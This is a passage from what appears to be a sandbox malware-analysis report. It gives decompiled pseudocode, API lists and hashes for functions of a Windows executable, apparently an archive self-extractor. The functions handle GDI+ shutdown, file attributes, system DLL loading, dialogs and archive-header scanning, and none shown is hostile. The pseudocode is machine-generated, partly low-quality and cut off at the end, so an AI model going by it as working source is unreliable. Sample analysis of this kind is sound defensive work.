                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2643169976-0
                                                    • Opcode ID: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                    • Instruction ID: cc83a65da11962d74a05e6f85a0778ccff7846d78407c5d839993e6fce246c71
                                                    • Opcode Fuzzy Hash: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                    • Instruction Fuzzy Hash: D8E0923114021D7BDB015F60DC45FEE375CAF08385F484026B948D6050EB61DE84EA55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00CDAC7C(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xd08438; // 0x76f5c100
				 *0xcf3278(_t5, _t13, _t16,  *[fs:0x0], 0xcf2641, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00CDEB32(); // executed
				_t8 =  *0xd23178( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}









                                                    0x00cdac8d
                                                    0x00cdac94
                                                    0x00cdaca5
                                                    0x00cdacab
                                                    0x00cdacb0
                                                    0x00cdacb5
                                                    0x00cdacbf
                                                    0x00cdacc8

                                                    APIs
                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00CF2641,000000FF), ref: 00CDACB0
                                                    • OleUninitialize.OLE32(?,?,?,?,00CF2641,000000FF), ref: 00CDACB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: GdiplusShutdownUninitialize
                                                    • String ID:
                                                    • API String ID: 3856339756-0
                                                    • Opcode ID: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                    • Instruction ID: 1658584647e0aba0b447ee0afdca330b7d0df24961190e4a3227804946fbbeb4
                                                    • Opcode Fuzzy Hash: 759822b3dc50db449b2b4e9cc6f18a771afbdc57e533c07eb7899544b7e86183
                                                    • Instruction Fuzzy Hash: 01E06D72604654EFCB11EB58DC06B59FBA9FB88B20F00426AF416D37A0CB74A801CAA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCA243(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E00CDEC50(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E00CCBB03(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}







                                                    0x00cca24b
                                                    0x00cca254
                                                    0x00cca25a
                                                    0x00cca25f
                                                    0x00cca280
                                                    0x00cca286
                                                    0x00cca286
                                                    0x00cca28c

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA254
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                    • Instruction ID: 40d495f7e1efcde5a5d71407508eb26e5e8639cd84a9e4c07fee9ead39c30e79
                                                    • Opcode Fuzzy Hash: e3c77b335e96fd8d84cb9867d479ac8c5a146eff3c4ae2e44d276789372c5a97
                                                    • Instruction Fuzzy Hash: 32E092325001286BCB50AB64DC09FE97B58EB083E5F044262FE58E3294DB70DE44CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDDEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
				short _v5124;
				signed int _t16;

				E00CDEC50(0x1400);
				E00CC4092( &_v5124, 0xa00, E00CCE617((_a16 & 0x000000ff) + 0x65), _a4);
				SetDlgItemTextW( *0xd08458, 0x65,  &_v5124); // executed
				_t16 = E00CDB568(); // executed
				return _t16 & 0xffffff00 |  *0xd08454 == 0x00000000;
			}





                                                    0x00cddeca
                                                    0x00cddeec
                                                    0x00cddf03
                                                    0x00cddf09
                                                    0x00cddf19

                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CDDEEC
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00CDDF03
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                    • String ID:
                                                    • API String ID: 2718869927-0
                                                    • Opcode ID: f71239f6d10ce09fbee399bfc8256c240753f9661953b020111ff4acbc73f155
                                                    • Instruction ID: 53121d0b300577812adef4f52182e9005048816b4c427017f1a61972ff3badf7
                                                    • Opcode Fuzzy Hash: f71239f6d10ce09fbee399bfc8256c240753f9661953b020111ff4acbc73f155
                                                    • Instruction Fuzzy Hash: 89E0D8B241034866DF02BB60DC06FDE3B6C5B15785F040856F344DB2B3EA78EA50A771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CD081B(intOrPtr _a4) {
				short _v4100;
				int _t8;
				struct HINSTANCE__* _t12;

				E00CDEC50(0x1000);
				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t8;
				if(_t8 != 0) {
					E00CCBDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
					_t12 = LoadLibraryW( &_v4100); // executed
					return _t12;
				}
				return _t8;
			}






                                                    0x00cd0823
                                                    0x00cd0836
                                                    0x00cd083c
                                                    0x00cd083e
                                                    0x00cd084c
                                                    0x00cd0858
                                                    0x00000000
                                                    0x00cd0858
                                                    0x00cd0860

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystem
                                                    • String ID:
                                                    • API String ID: 1175261203-0
                                                    • Opcode ID: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                    • Instruction ID: 605f624d3a934571f306518ec5873533d3e08377ba50a9d1eb486a8d6e3741db
                                                    • Opcode Fuzzy Hash: 7897a06d350d108bb6f2e8b1b00c71931eca85e37ccdb51a83b7119170371284
                                                    • Instruction Fuzzy Hash: C0E012764001587ADF11A794DC09FDA7BACAF09391F040066B645D2144DA74DA84DAA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E00CDA3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xcf4740;
				if(_a8 == 0) {
					L00CDEB1A(); // executed
				} else {
					L00CDEB20();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                                                    0x00cda3bc
                                                    0x00cda3be
                                                    0x00cda3c0
                                                    0x00cda3c3
                                                    0x00cda3c6
                                                    0x00cda3ce
                                                    0x00cda3cf
                                                    0x00cda3d2
                                                    0x00cda3d8
                                                    0x00cda3e1
                                                    0x00cda3da
                                                    0x00cda3da
                                                    0x00cda3da
                                                    0x00cda3e6
                                                    0x00cda3ec
                                                    0x00cda3f3

                                                    APIs
                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CDA3E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: BitmapCreateFromGdipStream
                                                    • String ID:
                                                    • API String ID: 1918208029-0
                                                    • Opcode ID: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                    • Instruction ID: fa14efc77a776fa9127a3f7d45163464c1a3db1f40bd62315043f94595e2d662
                                                    • Opcode Fuzzy Hash: 139324dc9d17a11b7794b7d3fd1ff622d6cc7eb9c301662065e23af0fa948a24
                                                    • Instruction Fuzzy Hash: 00E0ED71500218EBCB50EF55C54179ABBE8EB04360F10805BAA9697351E374FF04DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E00CE2B8C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00CE3C57(__ecx, __eflags, E00CE2AD0); // executed
				 *0xcfe7d0 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00CE3D08(_t7, __eflags, _t1, 0xd22060);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00CE2BBF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}







                                                    0x00ce2b91
                                                    0x00ce2b96
                                                    0x00ce2b9b
                                                    0x00ce2b9f
                                                    0x00ce2baa
                                                    0x00ce2bb0
                                                    0x00ce2bb1
                                                    0x00ce2bb3
                                                    0x00ce2bbe
                                                    0x00ce2bb5
                                                    0x00ce2bb5
                                                    0x00000000
                                                    0x00ce2bb5
                                                    0x00ce2ba1
                                                    0x00ce2ba1
                                                    0x00ce2ba3
                                                    0x00ce2ba3

                                                    APIs
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2BAA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CE2BB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1660781231-0
                                                    • Opcode ID: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                    • Instruction ID: 379308dc263a6dd2451f81de652551865d73416027ee4bb639b9d8bf98a164ba
                                                    • Opcode Fuzzy Hash: 81fa32f797c79bafe468c2c3a0bb0b4b4915483dfd9405221e5f6288c0907378
                                                    • Instruction Fuzzy Hash: F2D022741643C02A4C243E733D0BF79338EAD51B787B00BAAF0328A4C1EE51A280B022
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00CC12F1(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                                                    0x00cc12f8
                                                    0x00cc130d
                                                    0x00cc1313

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemShowWindow
                                                    • String ID:
                                                    • API String ID: 3351165006-0
                                                    • Opcode ID: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                    • Instruction ID: b268c6533427a23339467070f0941eccecf81cacc6b726044713af81d6a3c8a4
                                                    • Opcode Fuzzy Hash: a90a8644e0824b4665198f914123980f159018abcc1fd2378f48dd7525e6bba0
                                                    • Instruction Fuzzy Hash: 41C0123205C300BECB020BB4DC09C2BBBA8ABA5312F04C908B0A5C0260C23CC130DF21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E00CC1A04(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				char _t101;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t119;
				signed int _t125;
				intOrPtr _t126;
				char _t127;
				char _t137;
				intOrPtr _t142;
				signed int _t143;
				void* _t146;
				signed int _t151;
				signed int _t155;
				void* _t160;
				void* _t162;
				void* _t166;
				intOrPtr* _t167;
				signed int _t181;
				void* _t182;
				signed int _t184;
				char* _t198;
				intOrPtr _t199;
				signed int _t200;
				void* _t210;
				void* _t211;
				intOrPtr _t212;
				void* _t214;
				char* _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t224;
				void* _t226;

				_t210 = __edx;
				E00CDEB78(0xcf265a, _t226);
				_t167 = __ecx;
				_t212 = 7;
				 *((char*)(__ecx + 0x6cd4)) = 0;
				 *((char*)(__ecx + 0x6cdc)) = 0;
				 *0xcf3278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
					L23:
					_t101 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
					return _t101;
				}
				_t220 = 0;
				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
				_t103 = E00CC1DF8(__ecx + 0x2210, _t212);
				if(_t103 == 0) {
					E00CC13BA(_t226 - 0x38, 0x200000);
					 *(_t226 - 4) = 0;
					 *0xcf3278();
					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
					 *0xcf3278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
					_t109 =  *( *_t167 + 0xc)();
					_t181 = _t109;
					_t220 = 0;
					 *(_t226 - 0x14) = _t181;
					__eflags = _t181;
					if(_t181 <= 0) {
						L21:
						__eflags =  *(_t167 + 0x6cd8);
						_t182 = _t226 - 0x38;
						if( *(_t167 + 0x6cd8) != 0) {
							_t38 = _t226 - 4; // executed
							 *_t38 =  *(_t226 - 4) | 0xffffffff;
							__eflags =  *_t38;
							E00CC15FB(_t182); // executed
							L26:
							_t111 =  *(_t167 + 0x6cc8);
							_t234 = _t111 - 4;
							if(_t111 != 4) {
								__eflags = _t111 - 3;
								if(_t111 != 3) {
									L32:
									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
									 *((char*)(_t226 - 0xd)) = 0;
									_t113 = E00CC3B2D(_t167, _t210, _t220);
									__eflags = _t113;
									 *((char*)(_t226 - 0xe)) = _t113 != 0;
									__eflags = _t113;
									if(_t113 == 0) {
										L38:
										_t114 =  *((intOrPtr*)(_t226 - 0xd));
										L39:
										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
										__eflags = _t184;
										if(_t184 == 0) {
											L41:
											__eflags =  *((char*)(_t167 + 0x6cdc));
											if( *((char*)(_t167 + 0x6cdc)) != 0) {
												L43:
												__eflags = _t184;
												if(__eflags == 0) {
													E00CC138B(__eflags, 0x1b, _t167 + 0x32);
												}
												__eflags =  *((char*)(_t226 + 8));
												if( *((char*)(_t226 + 8)) == 0) {
													goto L23;
												} else {
													L46:
													__eflags =  *((char*)(_t226 - 0xe));
													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
													if( *((char*)(_t226 - 0xe)) == 0) {
														L69:
														__eflags =  *((char*)(_t167 + 0x6ccd));
														if( *((char*)(_t167 + 0x6ccd)) == 0) {
															L71:
															E00CD0602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
															L72:
															_t101 = 1;
															goto L24;
														}
														__eflags =  *((char*)(_t167 + 0x6cd1));
														if( *((char*)(_t167 + 0x6cd1)) == 0) {
															goto L72;
														}
														goto L71;
													}
													__eflags =  *((char*)(_t167 + 0x21f8));
													if( *((char*)(_t167 + 0x21f8)) == 0) {
														L49:
														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
															goto L69;
														}
														 *0xcf3278();
														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
														_t224 = _t119;
														_t214 = _t210;
														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
														while(1) {
															_t125 = E00CC3B2D(_t167, _t210, _t224);
															__eflags = _t125;
															if(_t125 == 0) {
																break;
															}
															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
															__eflags = _t126 - 3;
															if(_t126 != 3) {
																__eflags = _t126 - 2;
																if(_t126 == 2) {
																	__eflags =  *((char*)(_t167 + 0x6ccd));
																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
																		L66:
																		_t127 = 0;
																		__eflags = 0;
																		L67:
																		 *((char*)(_t167 + 0x6cd1)) = _t127;
																		L68:
																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
																		 *0xcf3278(_t224, _t214, 0);
																		 *( *( *_t167 + 0x10))();
																		goto L69;
																	}
																	__eflags =  *((char*)(_t167 + 0x3330));
																	if( *((char*)(_t167 + 0x3330)) != 0) {
																		goto L66;
																	}
																	_t127 = 1;
																	goto L67;
																}
																__eflags = _t126 - 5;
																if(_t126 == 5) {
																	goto L68;
																}
																L60:
																E00CC1F47(_t167);
																continue;
															}
															__eflags =  *((char*)(_t167 + 0x6ccd));
															if( *((char*)(_t167 + 0x6ccd)) == 0) {
																L56:
																_t137 = 0;
																__eflags = 0;
																L57:
																 *((char*)(_t167 + 0x6cd1)) = _t137;
																goto L60;
															}
															__eflags =  *((char*)(_t167 + 0x5680));
															if( *((char*)(_t167 + 0x5680)) != 0) {
																goto L56;
															}
															_t137 = 1;
															goto L57;
														}
														goto L68;
													}
													__eflags =  *((char*)(_t167 + 0x6cd4));
													if( *((char*)(_t167 + 0x6cd4)) != 0) {
														goto L69;
													}
													goto L49;
												}
											}
											__eflags = _t114;
											if(_t114 != 0) {
												goto L46;
											}
											goto L43;
										}
										__eflags =  *((char*)(_t226 + 8));
										if( *((char*)(_t226 + 8)) == 0) {
											goto L23;
										}
										goto L41;
									}
									__eflags = 0;
									 *((char*)(_t226 - 0xd)) = 0;
									while(1) {
										E00CC1F47(_t167);
										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
										__eflags = _t142 - 1;
										if(_t142 == 1) {
											break;
										}
										__eflags =  *((char*)(_t167 + 0x21f8));
										if( *((char*)(_t167 + 0x21f8)) == 0) {
											L37:
											_t143 = E00CC3B2D(_t167, _t210, _t220);
											__eflags = _t143;
											 *((char*)(_t226 - 0xe)) = _t143 != 0;
											__eflags = _t143;
											if(_t143 != 0) {
												continue;
											}
											goto L38;
										}
										__eflags = _t142 - 4;
										if(_t142 == 4) {
											break;
										}
										goto L37;
									}
									_t114 = 1;
									goto L39;
								}
								_t215 = _t167 + 0x2217;
								_t220 =  *( *_t167 + 0xc);
								 *0xcf3278(_t215, 1);
								_t146 =  *( *( *_t167 + 0xc))();
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									goto L23;
								}
								__eflags =  *_t215;
								if( *_t215 != 0) {
									goto L23;
								}
								_t212 = 8;
								goto L32;
							}
							E00CC138B(_t234, 0x3c, _t167 + 0x32);
							goto L23;
						}
						E00CC15FB(_t182);
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
						__eflags =  *_t198 - 0x52;
						if( *_t198 != 0x52) {
							goto L16;
						}
						_t151 = E00CC1DF8(_t198, _t109 - _t220);
						__eflags = _t151;
						if(_t151 == 0) {
							L15:
							_t109 =  *(_t226 - 0x14);
							goto L16;
						}
						_t199 =  *((intOrPtr*)(_t226 - 0x18));
						 *(_t167 + 0x6cc8) = _t151;
						__eflags = _t151 - 1;
						if(_t151 != 1) {
							L18:
							_t200 = _t199 + _t220;
							 *(_t167 + 0x6cd8) = _t200;
							_t220 =  *( *_t167 + 0x10);
							 *0xcf3278(_t200, 0, 0);
							 *( *( *_t167 + 0x10))();
							_t155 =  *(_t167 + 0x6cc8);
							__eflags = _t155 - 2;
							if(_t155 == 2) {
								L20:
								_t220 =  *( *_t167 + 0xc);
								 *0xcf3278(_t167 + 0x2210, _t212);
								 *( *( *_t167 + 0xc))();
								goto L21;
							}
							__eflags = _t155 - 3;
							if(_t155 != 3) {
								goto L21;
							}
							goto L20;
						}
						__eflags = _t220;
						if(_t220 <= 0) {
							goto L18;
						}
						__eflags = _t199 - 0x1c;
